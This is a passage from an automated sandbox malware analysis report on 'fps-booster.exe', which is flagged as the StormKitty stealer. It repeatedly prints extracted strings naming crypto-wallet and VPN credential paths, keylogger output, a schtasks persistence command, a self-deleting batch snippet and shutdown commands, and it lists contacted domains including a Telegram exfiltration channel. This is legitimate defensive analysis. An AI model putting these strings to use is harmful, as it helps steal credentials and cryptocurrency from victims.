-LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: Yara matchFile source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected StormKitty Stealer
        Source: Yara matchFile source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		11
        Process Injection        		1
        Disable or Modify Tools        		OS Credential Dumping1
        Query Registry        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading        		151
        Virtualization/Sandbox Evasion        		LSASS Memory231
        Security Software Discovery        		Remote Desktop Protocol1
        Data from Local System        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Obfuscated Files or Information        		NTDS151
        Virtualization/Sandbox Evasion        		Distributed Component Object ModelInput Capture3
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
        Software Packing        		LSA Secrets1
        Application Window Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials1
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        fps-booster.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://aka.ms/pscore6lB0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://www.newtonsoft.com/jsonschema0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://upx.sf.net0%URL Reputationsafe
        https://www.nuget.org/packages/Newtonsoft.Json.Bson0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://james.newtonking.com/projects/json0%URL Reputationsafe
        https://t.me/0%Avira URL Cloudsafe
        https://github.com/LimerBoy/StormKitty0%Avira URL Cloudsafe
        https://cdn4.cdn-telegram.org/file/fapIFbqBbgzeTGVf2MgK9R3TREdZxe6M1H7h8z6AC--HryTNnfiDs4V2Uktm05Uoq0%Avira URL Cloudsafe
        https://github.com/JamesNK/Newtonsoft.Json0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        t.me
        		149.154.167.99
        		truefalse
          		unknown
          smallduck.ru
          		217.78.239.114
          		truefalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://t.me/fps-booster.exe, 00000000.00000002.2484713243.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://cdn4.cdn-telegram.org/file/fapIFbqBbgzeTGVf2MgK9R3TREdZxe6M1H7h8z6AC--HryTNnfiDs4V2Uktm05Uoqfps-booster.exe, 00000000.00000002.2484713243.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://github.com/LimerBoy/StormKittyfps-booster.exe, 00000000.00000002.2489316587.0000000007790000.00000004.08000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2204160889.0000000004B21000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.newtonsoft.com/jsonschemafps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Licensepowershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://upx.sf.netAmcache.hve.6.drfalse
            • URL Reputation: safe
            		unknown
            https://www.nuget.org/packages/Newtonsoft.Json.Bsonfps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2204160889.0000000004B21000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://james.newtonking.com/projects/jsonfps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://github.com/JamesNK/Newtonsoft.Jsonfps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            217.78.239.114
